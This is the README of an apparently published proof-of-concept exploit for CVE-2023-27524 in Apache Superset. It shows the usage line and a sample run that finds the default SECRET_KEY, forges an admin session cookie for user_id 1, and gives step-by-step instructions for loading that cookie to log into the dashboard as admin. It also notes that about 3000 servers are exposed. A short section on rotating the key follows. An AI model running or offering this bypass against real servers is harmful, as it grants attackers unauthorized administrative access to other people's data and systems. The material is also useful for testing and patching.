CVE-2023-27524: Apache Superset Auth Bypass

Script to check if an Apache Superset server is vulnerable to (CVE-2023-27524) and if it is vulnerable then, forge a session cookie with the user_id = 1 which is usually the admin user allowing for authentication bypass and gaining access to the dashboard. Currently, there are about 3000 servers world-wide running Apache Superset.

Usage

usage: python3 CVE-2023-27524.py  --url URL 

Basic Example

% python3 CVE-2023-27524.py --url http://10.1.221.202:8080   
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard

Mitigations

Follow the instructions here to generate and configure a Flask SECRET_KEY. The superset CLI tool can be used to rotate the SECRET_KEY so that existing database connection information is preserved.

Disclaimer

This POC is created for educational purpose only

Reference

• https://github.com/horizon3ai/CVE-2023-27524
• https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/